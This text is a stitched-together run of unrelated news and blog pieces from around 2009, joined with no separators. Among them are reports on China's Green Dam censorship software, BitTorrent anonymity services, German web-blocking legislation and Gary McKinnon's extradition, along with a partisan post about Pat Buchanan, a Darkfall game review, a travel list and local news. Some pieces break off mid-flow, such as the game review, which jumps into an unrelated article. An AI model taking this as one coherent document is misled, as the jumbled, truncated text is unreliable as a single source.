The Chinese government has a history of censoring a broad range of Web content .
The new requirement could force PC manufacturers to choose between refusing a government order in a major market or opening themselves to charges of abetting censorship .
The software need n't be preinstalled on each new PC -- it may instead be shipped on a compact disc -- giving users some choice .
But if installed , foreign industry officials who have examined the software say , it could transmit personal information , cause PCs to malfunction , and make them more vulnerable to hacking .
It also makes it difficult for users to tell what exactly is being blocked , officials say .
A spokeswoman for Hewlett - Packard Co. HPQ 1.45 % , which has the largest PC market share of any U.S. vendor in China , said the company is " working with the government authorities and evaluating the best way to approach this .
Obviously we will focus on delivering the best customer experience while ensuring that we meet necessary regulatory requirements . "
Susan Stevenson , spokeswoman for the U.S. Embassy in Beijing , said the embassy was studying the new rule to assess its impact .
" We would view any attempt to restrict the free flow of information with great concern and as incompatible with China 's aspirations to build a modern , information - based economy and society , " she said .
The software 's Chinese name is " Green Dam - Youth Escort . "
The word " green " in Chinese is used to describe Web - surfing free from pornography and other illicit content .
Green Dam would link PCs with a regularly updated database of banned sites and block access to those addresses , according to an official who tested the product for a government agency .
The May 19 Chinese government notice about the requirement says it is aimed at " constructing a green , healthy , and harmonious Internet environment , and preventing harmful information on the Internet from influencing and poisoning young people . "
The software was developed by Jinhui Computer System Engineering Co. , with input from Beijing Dazheng Human Language Technology Academy Co .
Bryan Zhang , founder of Jinhui , said Green Dam operates similarly to software designed outside China to let parents block access to Web content inappropriate for children .
Some computers sold in China already come with parental - control software , but it is n't government - mandated .
Mr. Zhang said his company compiles and maintains the list of blocked sites , which he says is limited to pornography sites .
He said the software would allow the blocking of other types of content , as well as the collection of private user data , but that Jinhui would have no reason to do so .
He also said the software can be turned off or uninstalled .
His company plans to transmit new banned addresses to users '
PCs through an Internet update system similar to that used by operating - system software and antivirus programs .
The software requirement was outlined in a notice that was issued by China 's Ministry of Industry and Information Technology on May 19 but that has n't yet been publicized by state media .
The notice , a copy of which was seen by The Wall Street Journal , says PC makers must ship PCs to be sold in China as of July 1 with the Green Dam software " preloaded " -- pre-installed or enclosed on a CD .
The notice says PC producers will be required to report to the government how many PCs they have shipped with the software .
The notice does n't mention any punitive action for noncompliance .
Sales of PCs in China neared 40 million units last year , second only to the U.S. Chinese company Lenovo Group Ltd. had the largest market share , with 26.7 % of units shipped in the first three months of 2009 , while H - P had 13.7 % and Dell Inc. DELL - 0.99 % had 8.1 % , according to research firm IDC .
Manufacturers have more than just sales in China to consider when the government asks them to do something : Major PC companies also have investments in factories and research facilities in China .
Dell declined to comment on the software .
Lenovo said , " We review all legislation relating to our business , " and did n't comment further .
Foreign industry officials say companies have been given little time to properly test Green Dam .
" The lack of transparency , the shortness of time for implementation , and the incredible scope of the requirement that is not matched anywhere around the world present tremendous challenges to the industry , " said an industry official who has discussed the plans with several major PC makers .
China already operates an extensive Internet filtering system , commonly called the Great Firewall , which blocks access to a range of content , from pornography to politically sensitive sites .
Such sites have included those promoting Tibetan independence and the spiritual group Falun Gong ; in specific circumstances the government has blocked access to foreign media sites .
But that system blocks content at the network level , and many users circumvent it .
The new method could give the government a way to tighten its control , say foreign industry officials who have examined the software .
Having one universal application that opens a link into every computer could also make those computers more vulnerable to cyber attacks .
Mr. Zhang said that the software is no riskier than other programs that are updated periodically through the Internet .
Moreover , Green Dam , which is designed to work with Microsoft Corp .'s
Windows operating system , could also conflict with other applications , causing glitches or even system crashes , industry officials said .
Wu Weiwei , an official from the government 's China Software Testing Center who oversaw testing of the software , said extensive tests of the software have shown no problems .
U.S. Internet companies have for years grappled with demands from the Chinese government to censor content or share potentially private data with police .
Several of the biggest -- including Google Inc. , Yahoo Inc. and Microsoft MSFT 1.79 % -- joined together last October to announce a set of guidelines for how they would comply with censorship requests from countries such as China , including a promise to be transparent about the requests they receive .
But the effort , known as the Global Network Initiative , was criticized by some civil - liberties groups as being short on specifics and not doing enough to fight censorship laws .
No computer hardware makers are members of the group .
A Yahoo spokeswoman said that the company would " continue to analyze international developments that may impact our industry . "
" We strongly support the free flow of information and the right to freedom of expression , " she said .
Jinhui's
Web site said it has a long - term " strategic cooperative partnership " with a research institute of the Ministry of Public Security on image - recognition technology , as well as long - term " technical cooperation " with the People 's Liberation Army 's Information Engineering University .
Mr. Zhang said Jinhui has only worked with the Ministry of Public Security on issues concerning pornography .
The Web site of Dazheng , the other software company involved in developing Green Dam , says the company works with the Armored Engineering Institute of the People 's Liberation Army , and that it helped the PLA in 2005 produce a system to intercept " confidential " documents .
Wang Jingcheng , deputy general manager of Dazheng , said the Ministry of Industry and Information Technology has " strict regulations and forbids all software companies from collecting any personal information . "
He added that the software will block content " according to the law . "
— Kersten Zhang , Justin Scheck and Nick Wingfield contributed to this article .
Write to Loretta Chao at loretta.chao@wsj.com
Here we go again .
We know that the climate is vicious and that some element of the Republican establishment has tried to tamp down the hate , race , sexist element from all these analysts on tv , but Pat Buchanan takes the cake .
I highlight him because he has been on television a very long time spewing all his " they hate the white man " bullshit for years .
He hates affirmative action at any junction and if someone does not look like him , you can forget it .
Which is why , he along with King Rush and President Gingrich are the vocal leaders in promoting their disdain against a Latino woman who did nothing but the right thing .
If it ai n't white in their corner , it ai n't right .
Here we have the resident , code talker , Pat Buchanan on Hardball .
I know , why the hell is he on television ?
Well , he is there for amusement and to rally whatever troops the Republicans have left for the white man 's plight !!
Which for the record is no plight , but when you have a megaphone on television you are allowed to say any shit necessary , be it true or not !!
And then Buchanan goes bottom feeding on Washington Journal , C - SPAN .
I am not knocking Washington Journal , the show has informative guests and topics , but let 's be real , those callers are a piece of work .
Talk about conspiracy theories ?
None of them would be allowed on this site AT ALL !!
I guess 5 or 10 years ago , I would be worried about this negative noise , but I am not any longer .
This is a Republican Party issue , the nullification of minorities allowed in their group .
It is the Pat Buchanans , Rush Limbaughs , Glenn Becks , Hannitys , Bill O'Reillys that the Republicans have to worry about .
Case and point .
The overt niceness that have come from the Republican Senators on the Hill towards Sotomayor .
And you know what , that is great , but what about a SPINE .
A spine as in denouncing , publicly , by name all these racist and sextists gasbags that have been on television and talk radio 24/ 7 spewing race bait and code language since last week .
What about denouncing that GOP senators on the hill ?
Ah , but they never will .
Why ?
They are not forward thinking or even thinkers .
They are still holding the Lee Atwater playbook , that has been revised by Karl Rove .
Believing that there are just enough to make that 50.1 to win elections , believing if they let others make the point that it will become cement .
Unfortunately , not this time , not when you have the Latino community the largest and fastest growing in this country .
Attempting to disqualify a highly distinguished judge who has sat on the bench for 17 years is a hard one to swallow .
And if you think the Latino community wo n't remember , watch the 527 ads that will pop up on Spanish language television with the images of Pat Buchanan , Rush Limbaugh , attached to Judge Sotomayor and the reminder of their words , underlined at the end to remind folks they are REPUBLICAN .
That is going to be a hard one to beat .
cross-posted @ Daily Kos
Home Page
An elementary school in Villupuram district of Tamil Nadu , recently organised a show where a motorcyclist rode over the hands of children .
Students of classes I to V displayed their Karate skills by lying on the ground with their hands outstreached and a motorcyclist riding over them .
Later , the rider drove the two - wheeler over a wooden plank placed on a girl 's stomach as part of the event was held to mark the birth anniversary celebrations of former chief minister K Kamaraj .
However , the show came to an end after the wife of Tamil Nadu higher education minister K Ponmudi , the chief guest on the occasion , asked the school authorities to stop the event , a member of the Parents - Teachers Association ( PTA ) , said .
The state government today sought an explanation from the Villupuram chief educational officer of the district .
School authorities claimed the event was organised after obtaining the PTA 's consent .
They said students were trained to take part in the event and none had sustained any injuries .
Of course , I have n't played it enough .
There is a history here , which would be foolish to pretend does n't exist .
When Darkfall was first reviewed on Eurogamer , it scored 2/10 .
The developer , Aventurine , was incensed .
They 'd checked their logs to discover the reviewer had a total logged - in time of a couple of hours .
Eurogamer pressed their reviewer , who claimed their numbers must be wrong .
He gave it at least nine hours .
Eurogamer offered a re-review .
Aventurine declined .
Eurogamer bought an account anyway .
And two months later , I 'm here .
That 's the short version .
There 's much more you can dig into , if you like .
But from that brief precis , you know I could never have played it enough .
The first review leaves a long shadow .
I still have n't read it .
Seemed beside the point .
Darkfall is a fantasy massively - multiplayer online role - playing game .
Which seems an uncontroversial sentence , but conceals another slice of history .
Darkfall has been in development forever .
Since 2001 .
It 's a game which has its own vision , one which manages to hark back and forward simultaneously .
Rather than the class - based system which has dominated in contemporary times , where your abilities are linked to a choice of class and how you choose to progress it , it 's a skill - based system .
There 's races , but their effect is relatively secondary .
Like Ultima Online , it 's a game where you primarily improve by doing whatever you want to do .
Hit stuff to improve your sword - fighting .
Chop wood to improve you chop-wooding .
Sit down and have a nice rest to improve your sitting down and nice - resting .
Throw in full open player - versus - player combat ( i.e. as many random assaults as a North London tube station at closing time ) and full looting , and you 've got a game which clearly believes something has been lost by mollycoddling players .
If they could , you suspect they 'd implement a way to give tiny electric shocks through your keyboard every time someone slides a blade into your back when you 're fishing .
It 's good for you .
It means everything means something .
This is me being a little over - greedy .
I should have ran ages ago .
But I was greedy .
GREEDY FOR SCREENSHOTS .
I think they may be right , but I 'll get back to that eventually .
Where Darkfall is more progressive is in its complete rejection of the usual timer - based combat , embracing an action implementation instead .
When spell - casting or firing arrows - and remember that characters can excel in each of these areas as long as they practice in each - the game plays from a first - person perspective .
If you use a melee weapon , it goes to third - person .
Whatever you aim at , you hit .
The amount of damage you do is based upon your skills , but there 's a direct use of player skill - even at the most basic level - which is almost absent in most MMOs .
It 's not a game where you stand toe - to - toe with a monster , trading blows , safe in the knowledge that your damage - per - second is slightly higher than his , so his health bar will exhaust before yours .
Partially because of the aforementioned mechanics and partially because anyone passing and seeing you in such a vulnerable state is just going to leg it over , bash you on the head and take all your stuff .
And call you a care bear .
With constant friendly - fire on , you 're just as likely to kill your friends as anyone else .
It 's brutal .
I wish the combat system was deadlier , but I 'll get to that eventually too .
Okay .
Bar the endgame - player - controlled cities and warring guilds and mass sieges , and enough to make this , no matter what the flaws , probably the closest there is to a terrestrial - set EVE Online in terms of player - politicking - that 's the basics .
Let 's take a detour .
Rocks in iPod boxes .
Bricks in MacBook boxes .
Hell , we 've even seen meat in iPod boxes .
We hear the stories every few months about some poor sap who thinks he 's buying a new gadget from the store , only to discover a next - gen set of cement chips once he gets home and peels the plastic off .
But how ( and why ) does this kind of thing happen ?
We spoke to three former retail employees to find out .
Whodunnit
The thing we learned right off the bat is that this phenomenon has been going on for many , many years , though it received more coverage lately because of the blogosphere 's popularity explosion .
With more people buying music players , laptops , and other gadgets than ever and with more venues available to vent about bad experiences online , it 's easy to raise a public outcry when this kind of thing happens .
" We had it happen a few times ( mainly replaced by old or broken merchandise ) , and it was usually a judgment call regarding whether it was credible or not , " said one former Cambridge Soundworks employee .
The general consensus , however , is that customers themselves are responsible for the large majority of these cases .
People purchase an expensive item , take it home , replace it with bricks , and sometimes even shrinkwrap the box for a return .
Many retail stores wo n't check a box that looks like it was never opened in the first place , making this an easy switch to pull .
" If you get the right customer service rep who 's had a bad day — or perhaps even someone you know at the store — then return an item at the right time , they do n't check the box and you get your money back , " a former Circuit City employee named David told Ars .
" Maybe the store is really busy and everyone is in a rush , and people just assume that with many electronics , the weight is enough proof . "
Our three - man panel was split on the likelihood of employees being responsible for the switcheroo .
David said that his time at Circuit City exposed him to lax return policies from manufacturer warehouses , and he said that there were many times when the store itself could just shrinkwrap a returned item to sell with an open box discount .
" You learn a few other tricks and you can have your own little electronics trade going on , " he said .
But the Cambridge Soundworks employee disagreed : " Employees have much easier ways of stealing merchandise — there 's enough material there for another article altogether ! "
Regardless of who 's responsible , a former Apple Store employee also named David felt strongly that there 's a reason certain chains have this problem more than others — varying inventory management policies .
Apple apparently experiences this problem so little ( if at all ) that it 's not even on the radar .
Every single returned item must be inspected by a Genius at an Apple Store before taking it back , and Circuit City David agreed that items that have been shrinkwrapped at home still display telltale signs of being opened — an observant employee should be able to identify tampering even with a box that is still wrapped .
The key is the " observant " part .
As for employee theft , Apple keeps its stockroom locked with more locked cages inside , and employees must sign out a key from a manager before gaining access to product .
And that 's not all .
" All employees ' bags had to be searched by a manager prior to leaving the store at the end of a shift , " Apple David said .
" Any personal tech gear had to be registered with the store , and a manager would issue a ' personal technology card ' with your items and their serial numbers , which would be checked every time you left the building with said gear . "
Still , when you find yourself with a box full of masonry instead of a laptop , the store 's lax inventory management policies are often at the bottom of your list of worries for the moment .
Everyone we spoke to recommended either opening the box in the store ( " You might look like a douche when stepping aside to open your new gadget , but making sure you actually got your money 's worth is rarely a bad idea , " Circuit City David said ) , or calling immediately upon discovery .
One person also suggested that requesting another unit instead of a refund can go a long way to back up your claim that you 're a victim and not the victimizer .
We have many readers who spent at least some time selling electronics in their youth — what are your experiences with this kind of thing ?
Can you top the meat story ?
Have any tips to offer cautious buyers ?
Users of BitTorrent and other file - sharing networks are increasingly seeking solutions to hide their identities from the outside world .
With pressure from anti-piracy outfits mounting on ISPs to police their networks and warn those who share copyrighted content , many file - sharers have decided to negate this by going anonymous .
The UK government has high hopes for the piracy warnings Internet providers will be required to send to copyright infringing customers .
The warnings are designed to scare users away from illicit file - sharing , but when we asked our readers what action they would take upon receiving a warning letter from their ISP , many were unmovable .
A massive 41 % indicated that they would take steps to conceal their identity , while only 7 % of our readers said they would obey the warning and stop sharing .
The results of the survey clearly showed that avid file - sharers would rather hide their identities than stop downloading .
And indeed , more and more BitTorrent users are seeking ways to protect their privacy online , rendering all the newly proposed anti-piracy laws useless .
TorrentPrivacy and BTGuard are just two examples of services launched in the past year , targeted at concerned BitTorrent users .
The goal of these and other anonymity applications is clear ; hide the IP - address of the file - sharer so he ca n’t be tracked down while swapping files .
Currently in beta , The Pirate Bay ’s Ipredator uses the same tech platform as the VPN service Relakks .
For a few dollars a month it routes all your traffic through its servers , hiding your IP address .
Ipredator is currently limited to 3000 users but according to the Pirate Bay team there are another 180,000 users on the waiting list , eager to join .
Running a VPN network for hundreds of thousands of hungry BitTorrent users will prove to be quite a challenge .
The infrastructure and bandwidth required by a service targeted at file - sharers is significant , not to mention costly .
This undoubtedly leads to problems .
The aforementioned Relakks saw its subscriptions double in just a month when the controversial Ipred law came into effect in Sweden this April .
This surge in subscriptions led to to major problems with support and updates according to Relakks ’s chairman Jan Erik Fiske .
Unlike more traditional VPN services , BitBlinder recently introduced a free solution .
Instead of routing the traffic through a central server BitBlinder passes it on through multiple peers .
Each peer in the chain only knows the IP address of the next person in the chain , not the original requester / sender .
A few days after its launch BitBlinder had signed up more than 30,000 new users .
Right now registrations are temporarily closed to make sure everything runs smoothly for those already using the service , and while they iron out bugs .
“ We want to make sure it works , and is secure for everyone , ” Josh Albrecht , one of the creators of BitBlinder told TorrentFreak .
Because of the increasing interest in anonymity , the Swedish ISP Alltele decided to offer a free service to conceal the IP - addresses of its customers .
According to Alltele ’s CEO Ola Norberg thousands of users have downloaded the application , which nearly killed the server it was running on .
These examples clearly show that the scare tactics of the entertainment industry are not going to work .
There is no doubt that with every new anti-piracy initiative introduced , more and more users will find their way to one of the many anonymizing services out there .
Instead of stopping the pirates in their tracks the entertainment industry has simply inspired a new ‘ industry ’ worth millions of dollars .
Vor der Bundestagsanhörung zum Gesetzesentwurf der Bundesregierung und der großen Koalition " zur Bekämpfung der Kinderpornographie in Kommunikationsnetzen " am Mittwoch haben sich zahlreiche Lobbyvereinigungen zu Wort gemeldet .
Sechs Organisationen , die sich den Kinderschutz auf die Fahnen geschrieben haben , fordern in einer gemeinsamen Stellungnahme eine " Versachlichung der Debatte " .
Ziel müsse es sein , die sexuelle Ausbeutung von Kindern zu stoppen .
Dazu gehört auch die Behinderung der " Verbreitung der Bilder dieses Missbrauchs " , machen sich die Verbände für Web - Sperren stark .
Kinderschutz und Informationsfreiheit dürften nicht gegeneinander ausgespielt werden .
Das von Blockadegegnern zu hörende Argument , dass die geplanten Stopp - Schilder leicht zu umgehen seien , ist für das Bündnis , in dem der Deutsche Kinderschutzbund , das Deutsche Kinderhilfswerk , ECPAT , Innocence in Danger , Save the Children und UNICEF vertreten sind , nicht stichhaltig .
" Das kann nur bedeuten , effizientere Mechanismen zu fordern , Ausnahmen auszuschließen und den bisherigen Gesetzentwurf entsprechend zu verbessern . "
Internetexperten sollten sich " herausgefordert fühlen , bei der Suche nach besseren technischen Lösungen zur Eliminierung der Missbrauchsbilder mitzuwirken und die Strafverfolger bei der Ermittlung der Täter zu unterstützen " .
Auf keinen Fall dürfe hingenommen werden , " dass Bilder , auf denen Kinder oft regelrecht gefoltert werden , ungehindert im Netz kursieren " .
Zuvor hatte sich der Kinderschutzbund schon gemeinsam mit anderen Verbänden für eine Verschärfung der technischen Anforderungen an Web - Blockaden eingesetzt .
Auch der Bitkom , der sich Anfang Mai für massive Änderungen an dem Gesetzesvorhaben aussprach , sieht weiter Klärungsbedarf .
Unklar sei etwa , warum staatliche Internet - Anbieter wie Bibliotheken und Unis von der Pflicht zur Sperrung ausgenommen werden sollen .
Der Hightech - Verband befürchtet , dass das ganze Vorhaben deshalb verfassungsrechtlich scheitern könnte .
Wie viele andere der zur Anhörung geladenen Experten beäugt der Bitkom ferner die im Raum stehende Regelung sehr skeptisch , dass jeder Aufruf kinderpornographischer Web - Adressen an Staatsanwaltschaften oder Polizeien übermittelt werden könnte .
" Zufallsbesucher " solcher Seiten sollten zwar durch ein staatliches Stoppschild abgeschreckt , aber nicht generell kriminalisiert werden .
Die Medienwissenschaftlerin Korinna Kuhnen stellt in ihrer Eingabe dagegen klar : Die Erfolgserwartung , dass sich rund 80 Prozent der Kinderpornographie - Konsumenten durch die Maßnahme von der Besitzverschaffung des Materials abhalten ließen , sei unrealistisch .
Nach allen bekannten Strukturen kinderpornographischer Angebote im Web sei " der Zufallsfund " die Ausnahme und die bewusste Absicht des Abrufs die Regel .
Dem Juristen Dieter Frey , der schon bei einer früheren parlamentarischen Sachverständigenrunde und in einem Gutachten für den Bundesverband Digitale Wirtschaft ( BVDW ) gegen Web - Sperren Position bezog , erscheint der Vorstoß " unverhältnismäßig " .
Ähnlich wie der Verband der deutschen Internetwirtschaft eco argumentiert er , dass gemäß dem " Ultima Ratio " - Grundsatz zunächst gegen die eigentlichen Anbieter der Inhalte und gegebenenfalls gegen die Betreiber der Internetserver vorgegangen werden müsste , bevor Zugangserschwerungen auf der Ebene von Access - Providern erwogen werden dürften .
Weiter bemängelt Frey , dass in dem Entwurf " wesentliche Fragen der grundrechtlichen Eingriffsintensität offen bleiben " .
Eine relativ zielgenaue Zugangserschwerung sei nur anhand der Zieladresse in Form einer URL denkbar .
Die Initiative lasse aber auch die Verwendung des " vollqualifizierten Domainnamens " oder von IP - Adressen zu , was zu ganz erheblichen Kollateralschäden im Hinblick auf rechtmäßige Inhalte führen könne .
Diese würden durch die Pflicht zur Sperrung schon von Verweisen auf Kinderporno im Web weiter verschärft .
So könnte etwa ein journalistisches Angebot in die Sperrliste aufgenommen werden , das sich kritisch mit der Beurteilung eines vermeintlich kinderpornographischen Angebots durch das Bundeskriminalamt ( BKA ) auseinandersetzt .
Die angestrebte " Technologieneutralität " der Filtermaßnahmen überlasse es zudem in einem grundrechtssensiblen Bereich Privaten , " über die Eingriffsintensität von Maßnahmen zu entscheiden , die nach dem Gesetzentwurf sogar rechtmäßige Angebote erfassen können " .
Das BKA betont dagegen , dass in keinem der bereits auf Web - Sperren setzenden Länder " andere Inhalte als Kinderpornographie gesperrt werden " und widerspricht so Analysen der entsprechenden Schwarzen Listen durch Beobachter aus der Internetgemeinde .
Insgesamt hätte die Umsetzung des Entwurfs nicht nur den Aufbau einer " universell einsetzbaren Sperrinfrastruktur " zur Folge , warnt Frey trotzdem .
Die Internetzugangsdienste von Access - Providern könnten nicht mehr als gesellschaftlich besonders erwünschte , inhaltsneutrale Infrastrukturleistungen betrachtet werden , " die grundsätzlich blind gegenüber einer rechtlich qualitativen Bewertung der durchgeleiteten Daten und Kommunikationsvorgänge sind " .
Dies öffne den
Weg gar für zivilrechtliche Sperrungswünsche etwa aus Urheberrechtsgründen .
Insgesamt ist laut dem Anwalt die Verfassungskonformität auch wegen der Gefahr weiterer , in Ausmaß und Rechtsfolgen nicht voraussehbarer Grundrechtseingriffe nicht gewahrt .
Konkret fehle es an einer verfahrensrechtlichen Absicherung der Sperrliste oder an Regeln zur Kostenerstattung für die Provider .
Zudem werde eine Auswertung des gesamten Datenverkehrs der Internetnutzer nötig .
Der Deutsche Industrie- und Handelskammertag ( DIHK ) lehnt den Entwurf ebenfalls ab und hält die Eile , mit dem das Vorhaben noch vor der Sommerpause durch den Bundestag gejagt werden soll , " für in der Sache eher schädlich " .
Mehrere SPD - Abgeordnete ließen unterdessen durchblicken , den Entwurf in dieser Legislaturperiode entweder gar nicht oder nur in sehr veränderter Form beschließen zu wollen .
Zu den Plänen für ein Gesetz zu Web - Sperren gegen Kinderpornographie brachte c't in Ausgabe 12/09 einen auch online abrufbaren Kommentar :
Siehe dazu auch :
( Stefan Krempl ) / ( pmz )
Well , this is neat .
The paperclips on the ground dance , because of electrical energy below the surface .
The electric current comes from the motor , that is hidden unter the floor .
Pink Tentacle goes :
The Kobe New Transit Company , which operates the Rokko Liner ( as well as the Port Liner , which uses similar trains ) , says extra shielding is being installed just in case .
[ via ]
Twenty workers have occupied a Thomas Cook travel agents shop in Dublin after they were told they were being sacked with immediate effect .
TSSA union organiser Patrick McCusker spoke to Socialist Worker from inside the occupation .
“ We ’ve been occupying the building since noon today .
The big bosses came in with a letter in their pockets and told us they ’d shut the two shops .
“ The company ’s making a profit .
The chief executive gave himself a massive bonus this year . ”
Thomas Cook ’s head in Ireland , Manny Fontenla - Novoa , was awarded a seven million euro bonus ( about £ 5 million ) earlier this year .
Thomas Cook made more than £ 400 million in profits in Ireland in 2008 .
The workers , who are in the TSSA union , had already staged a protest last week when they were told their shop was to close on 6 September .
They had decided to take strike action .
Patrick says , “ We balloted for a strike this week .
For the first time in my life we had 100 percent in favour of industrial action . ”
But today they were told the closure had been brought forward and they should leave the premises immediately .
Patrick continues , “ The management said , you ’re sacked and here ’s your letter .
We told them to go and get stuffed .
“ We wo n’t be treated without respect or dignity .
We locked ourselves in the top floor offices .
“ Everyone ’s been talking about the Isle of Wight , Visteon and Waterford occupations .
“ We ’ve got a window where we can get supplies in and out .
And we can shout down to people below .
We ’re not going anywhere .
We ’ll occupy until they start talking sense . ”
A total of 44 people have been sacked at two Dublin stores .
The 20 are occupying the Grafton Street office ( opposite Trinity College Dublin ) .
Thomas Cook plans to close all its shops in Ireland .
Send emails of support to [ email protected ] and [ email protected ]
Forest Home Cemetery once again is a place for the living , not just the dead .
Three abandoned , century - old greenhouses that years ago produced flowers to beautify the graves and grounds of the historic south side cemetery are being brought back to life , this time with vegetables .
Empty for nearly a decade because they became too expensive to heat through winter , the A - frame glass greenhouses will be used year - round by the organization Growing Power to grow thousands of pounds of fresh vegetables for city residents and others served by the nonprofit group , based on the north side .
" We 're prolonging people 's lives through healthy , affordable food , " Growing Power CEO and founder Will Allen said recently , as he watered a sea of seedlings in the largest of the cemetery greenhouses .
" We 're providing nutrients to keep people living longer , before they wind up out there , " he added , pointing toward tombstones that span 200 acres of picturesque cemetery - a final resting place for soldiers , average folks and the locally famous , including Milwaukee mayors , Wisconsin governors , beer barons , bankers and industrialists .
By fall , school groups will be able to both visit the graves of Milwaukee 's founding fathers and tour vibrant greenhouses to see how fresh vegetables can be planted in cities to help feed the masses .
The new urban farm is tucked in a peaceful setting with a surprisingly rich history of growing food .
American Indians grew corn in this area , known as Indian Fields , in the 1700s , according to Milwaukee historian John Gurda .
The cemetery planted a Victory Garden to supply employees with vegetables during World War II , Gurda wrote in " Silent City : A History of Forest Home Cemetery . "
Premium on healthy food
Once again , fresh vegetables are at a premium while the country is at war .
Poverty has been linked to poor eating habits , which contribute to obesity and health problems such as diabetes and heart disease .
It 's appropriate that the cemetery greenhouses be returned to service to help prevent premature deaths , Allen said .
Forest
Home initially offered to donate the dormant greenhouses to Growing Power if employees would dismantle and take the structures away , Forest Home Cemetery President Thomas C. Kursel said .
Growing Power asked to rehab and use the greenhouses on site because moving them would be cost - prohibitive .
The nonprofit cemetery agreed , and Growing Power began rehabbing and planting earlier this month .
" Imagine how many pounds of food are already in here , " Allen said , as he watered the tiny cauliflower , pepper and tomato seedling in flats .
" There are 60 plants in one flat , and five pounds of tomatoes come from each plant .
With just four flats , that 's 1,200 pounds of tomatoes . "
Growing Power sells its vegetables through stores such as Outpost Natural Foods , restaurants here and in Chicago , farmers markets and corporate cafeterias .
It also has a Market Basket program that offers weekly bags of fresh fruits and vegetables at below - market prices .
No food will be sold direct from the cemetery .
It will be processed through other Growing Power locations .
Growing Power can produce a high volume of affordable food because Allen has developed cost - efficient renewable energy systems to nurture fast - growing plants in tight , urban spaces .
The nonprofit also is tied into a network of farmers to help provide produce year - round .
The cemetery greenhouses will be heated in winter through aquaponics - a closed system that replicates a clean river with fish and plants .
It works like this : Large tanks of water stocked with fish such as tilapia are heated .
The water releases heat into the air , so no other energy source is required .
( Heating water also is much less expensive than heating air . )
Plants keep the water clean for the fish , which also are sold as food .
The annual cost for heating the circa -1900 greenhouses reached about $ 20,000 when the cemetery decided to shut them down in 2000 , Kursel said .
Growing food in a cemetery may be unusual , but it fits the mission of urban agriculture , Allen said .
" Urban agriculture is about finding places where people would n't think of to grow food , " he said .
" Instead of tearing down these historic greenhouses , we 're giving them a new purpose . "
The effort also ties in with the cemetery 's ongoing efforts to revitalize itself for the next 100 years of burials .
( Yes , there are vacant plots available . )
The cemetery still offers seasonal flower packages to families for beautifying graves .
Instead of continuing to buy these flowers from wholesalers elsewhere , Kursel said , the cemetery could possibly buy them from Growing Power if there 's enough room to grow both flowers and vegetables in the greenhouses .
Forest Home Cemetery was founded in 1850 to reflect the " garden cemetery " movement , with winding roads , grand fountains and Victorian gardens creating a park - like setting for families to honor the dead .
About 40 Victorian garden cemeteries still exist around the country , mostly on the East Coast , according to Kursel .
Anyone who bought burial space at Forest Home in the late 1800s also could plant trees , shrubs and elaborate flower beds on graves , Gurda wrote in his historical account of the cemetery .
Geraniums , verbenas and lantanas were seeded in cemetery greenhouses staffed by a horticulturalist .
Before the county 's public park system was developed , Forest Home was a weekend leisure destination for thousands of Milwaukeeans who headed to the cemetery on Sundays - as many as 8,000 visitors at a time in the late 19th century - bringing picnic lunches and baseball mitts to enjoy the day , Gurda wrote .
Burial plots became less ostentatious by the turn of the 20th century , Gurda wrote .
Self - contained memorial gardens gave way to less landscaping , and less frequent family visits .
Grass replaced flowers .
Cemetery crews took over grave tending .
Now maintenance - free silk flowers are the standard grave decoration .
Kursel is n't the only Forest Home employee excited about the greenhouses coming back to life .
" It 's going to be a happy place , " said Candise Graff , who started working in the cemetery office in 1976 , when the greenhouses were vibrant with flowers .
" It makes being around this type of business not as sad , " Graff said .
" Now there 's a sense of renewal - of things being born again . "
Europe is certainly one of the top travel destinations in the world ; there are endless reasons why it is a great idea to travel here .
Most European countries are traditional and historical and offer tourists breath - taking beauty .
Below are five cities that should be on your must - visit list :
Berlin
The Berlin Wall is one of the famous attractions in Berlin .
The wall was built to stop East Germans from moving to the west side of the country .
If you are up for a night full of fun and parties , then Berlin is a good choice .
There are endless amounts of fun to be had in the evenings , including bar hopping , going to techno clubs , enjoying burlesque acts , acrobatic acts , comedy and singing .
Milan
Milan was at the heart of a few of Europe ’s traditionally noteworthy art movements .
These art movements are reflected in the excellence and extent of its museums .
Their art galleries also reflect the beauty of Europe ’s culture and tradition , Milan is where you will find the famous painting by Leonardo da Vinci – ‘ Last Supper ’ ( 1495 –1498 ) .
A great way to explore Milan is to book onto a group tour to make sure that you do n’t miss out on anything .
Whilst there , you must also try some of the delicious food on offer , including veal Milanese .
Paris
Gaze at the City of Lights with wonder and awe .
Paris is known for its romantic ambiance that is perfect for celebrating romance .
With its abundance of museums , amazing restaurants and stylish shops , there is plenty to do , making it the perfect location for a weekend getaway .
Whilst there , you must sample the delectable French cuisine .
Depending on your budget , whilst it is expensive , Hotel Costes is famous for its restaurant and serves up some delicious steak frites .
London
London is home to countless tourist attractions ; the London Eye offers a breathtaking view of the city and on the west end of the city , you can visit spectacular museums .
One of the best ways to see the city is through doing a tour .
Tours run along the River Thames and all throughout the city depending how much time you have and what you want to see .
If you want to see the river , another option is enjoying a river cruise .
Copenhagen
Copenhagen is known for its simple and functional architecture .
Copenhagen has one of the most well - organized transportation routes in Europe ; everything you need is within a short distance .
Copenhagen is also a bike - friendly city , perfect for any eco conscious travellers .
During summer , you can swim and relax in the harbour with your family and friends and enjoy the view of the city from the water side if you book a canal tour .
Europe is home to some of the best cities in the word ; these cities never sleep and are constantly developing for the better .
Given the array of structural design , weather , landscapes and historical location points , there is something for every traveller in Europe .
The British computer hacker Gary McKinnon failed today in his latest legal attempt to avoid extradition to the US where he could face a sentence of up to 60 years in a high - security prison .
The high court dismissed two claims for judicial review , dismaying McKinnon 's family and supporters .
Janis Sharp , his mother , said : " We are heartbroken .
If the law says it 's fair to destroy someone 's life in this way , then it 's a bad law . "
McKinnon 's lawyers said he would appeal against the decision while his mother asked Barack Obama to intervene .
Standing outside the high court , Sharp made a direct address to the US president .
" Stand by us and make this world a better place , a more compassionate place , " she said .
" Obama would n't have this .
He does n't want the first guy extradited for computer misuse to be a guy with Asperger 's , a UFO guy .
He would n't want this . "
The high court decided to uphold a refusal by Keir Starmer , the director of public prosecutions , to sanction a trial of the 43 - year - old " UFO eccentric " in Britain .
It also ruled that the former home secretary Jacqui Smith had taken into account McKinnon 's Asperger 's syndrome condition when considering the US extradition request .
McKinnon 's lawyers had argued that extradition would lead to " disastrous consequences " for his health , including possible psychosis and suicide .
Lord Justice Stanley Burnton and Mr Justice Wilkie in a 41 - page ruling said extradition was " a lawful and proportionate response to his offending " .
The home secretary , Alan Johnson , said he would abide by the ruling .
" It would be illegal for me to stop the extradition of Gary McKinnon , which the court ruling has made clear , " he said .
" Mr McKinnon is accused of serious crimes and the US has a lawful right to seek his extradition , as we do when we wish to prosecute people who break our laws . "
